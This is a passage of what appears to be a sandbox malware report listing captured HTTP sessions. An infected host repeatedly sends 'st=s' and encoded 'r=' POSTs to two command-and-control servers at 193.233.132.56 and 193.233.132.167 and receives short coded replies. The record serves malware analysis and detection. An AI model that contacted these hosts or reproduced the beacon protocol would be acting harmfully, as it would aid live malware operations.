                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:26.771167994 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1409 | 192.168.2.5 | 51264 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:26.843945026 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:27.096658945 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1410 | 192.168.2.5 | 51265 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:27.021985054 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:27.273685932 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1411 | 192.168.2.5 | 51266 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:27.433020115 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:27.680918932 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1412        192.168.2.5  51267        193.233.132.56   80
                                                                                                                                                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:27.604831934 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:27.854819059 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1413        192.168.2.5  51268        193.233.132.167  80
                                                                                                                                                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:27.932941914 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:28.187618017 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1414        192.168.2.5  51269        193.233.132.56   80
                                                                                                                                                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:28.098064899 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:28.340475082 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1415        192.168.2.5  51270        193.233.132.167  80
                                                                                                                                                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:28.518508911 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:28.757797003 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1416        192.168.2.5  51271        193.233.132.56   80
                                                                                                                                                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:28.682579041 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:28.931243896 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1417        192.168.2.5  51272        193.233.132.167  80
                                                                                                                                                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:29.014595032 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:29.271383047 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1418        192.168.2.5  51273        193.233.132.56   80
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:29.178479910 CEST  312                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:29.426361084 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1419        192.168.2.5  51274        193.233.132.167  80
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:29.615556955 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:29.859255075 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1420        192.168.2.5  51275        193.233.132.56   80
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:29.761034012 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:30.010283947 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1421        192.168.2.5  51276        193.233.132.167  80
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:30.106158018 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:30.354044914 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1422        192.168.2.5  51277        193.233.132.56   80
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:30.261141062 CEST  312                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:30.512808084 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1423        192.168.2.5  51278        193.233.132.167  80
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:30.701637983 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:30.952784061 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP  Source Port  Destination IP  Destination Port
1424  192.168.2.5  51279  193.233.132.56  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:30.844021082 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:31.092019081 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP  Source Port  Destination IP  Destination Port
1425  192.168.2.5  51280  193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:31.207171917 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:31.462263107 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP  Source Port  Destination IP  Destination Port
1426  192.168.2.5  51281  193.233.132.56  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:31.339226961 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
